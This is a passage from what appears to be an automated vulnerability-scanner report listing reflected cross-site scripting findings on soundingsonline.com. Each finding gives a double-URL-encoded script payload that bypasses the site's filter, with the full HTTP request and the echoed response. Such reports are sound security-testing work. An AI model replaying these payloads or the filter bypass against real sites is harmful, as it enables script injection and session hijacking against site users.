2.21. http://www.soundingsonline.com/columns-blogs/under-way [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/under-way

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52975%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edb3c7c9fe1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 52975"><script>alert(1)</script>db3c7c9fe1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /columns-blogs/under-way?52975%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edb3c7c9fe1c=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/columns-blogs/under-way?52975"><script>alert(1)</script>db3c7c9fe1c=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.22. http://www.soundingsonline.com/contact-us [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /contact-us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5850%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eacf387a70db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c5850"><script>alert(1)</script>acf387a70db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contact-us?c5850%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eacf387a70db=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/contact-us?c5850"><script>alert(1)</script>acf387a70db=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.23. http://www.soundingsonline.com/features [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89ad6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3cbaba1e44d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 89ad6"><script>alert(1)</script>3cbaba1e44d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /features?89ad6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3cbaba1e44d=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features?89ad6"><script>alert(1)</script>3cbaba1e44d=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.24. http://www.soundingsonline.com/features/in-depth [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/in-depth

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae44c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8d35706e11a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae44c"><script>alert(1)</script>8d35706e11a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /features/in-depth?ae44c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8d35706e11a=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/in-depth?ae44c"><script>alert(1)</script>8d35706e11a=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.25. http://www.soundingsonline.com/features/justyesterday [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/justyesterday

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 314be%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e162c4d495b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 314be"><script>alert(1)</script>162c4d495b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /features/justyesterday?314be%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e162c4d495b9=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/justyesterday?314be"><script>alert(1)</script>162c4d495b9=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.26. http://www.soundingsonline.com/features/lifestyle [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/lifestyle

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc1e7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e981f5a3f63a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cc1e7"><script>alert(1)</script>981f5a3f63a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /features/lifestyle?cc1e7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e981f5a3f63a=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/lifestyle?cc1e7"><script>alert(1)</script>981f5a3f63a=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.27. http://www.soundingsonline.com/features/profiles [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/profiles

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b6d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed38ae411bb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7b6d3"><script>alert(1)</script>d38ae411bb6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /features/profiles?7b6d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed38ae411bb6=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/profiles?7b6d3"><script>alert(1)</script>d38ae411bb6=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.28. http://www.soundingsonline.com/features/technical [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/technical

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22fdb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e60ec098217 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 22fdb"><script>alert(1)</script>60ec098217 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /features/technical?22fdb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e60ec098217=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/technical?22fdb"><script>alert(1)</script>60ec098217=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.29. http://www.soundingsonline.com/features/type-of-boat [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/type-of-boat

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17b36%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9fc8ed8b81c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17b36"><script>alert(1)</script>9fc8ed8b81c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /features/type-of-boat?17b36%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9fc8ed8b81c=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/type-of-boat?17b36"><script>alert(1)</script>9fc8ed8b81c=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.30. http://www.soundingsonline.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b17a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea893ecab85e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9b17a"><script>alert(1)</script>a893ecab85e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111&9b17a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea893ecab85e=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:49:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:49:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/buy-a-boat?9b17a"><script>alert(1)</script>a893ecab85e=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.31. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [image_x parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the image_x request parameter is copied into the HTML document as plain text between tags. The payload 4eeec<script>alert(1)</script>a46501efcd6 was submitted in the image_x parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=04eeec<script>alert(1)</script>a46501efcd6&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0px;
   left: 04eeec<script>alert(1)</script>a46501efcd6px;
   position: absolute;
   display: block;
}

div.gk_news_image_1_wrapper h2 {
   margin-bottom: 15px;
}

div.gk_news_image_1_wrapper h2 a {
   font:normal 28px Geneva, Arial, Helvetica, sans-ser
...[SNIP]...

2.32. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [image_y parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the image_y request parameter is copied into the HTML document as plain text between tags. The payload e255c<script>alert(1)</script>249d8d38b12 was submitted in the image_y parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0e255c<script>alert(1)</script>249d8d38b12&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
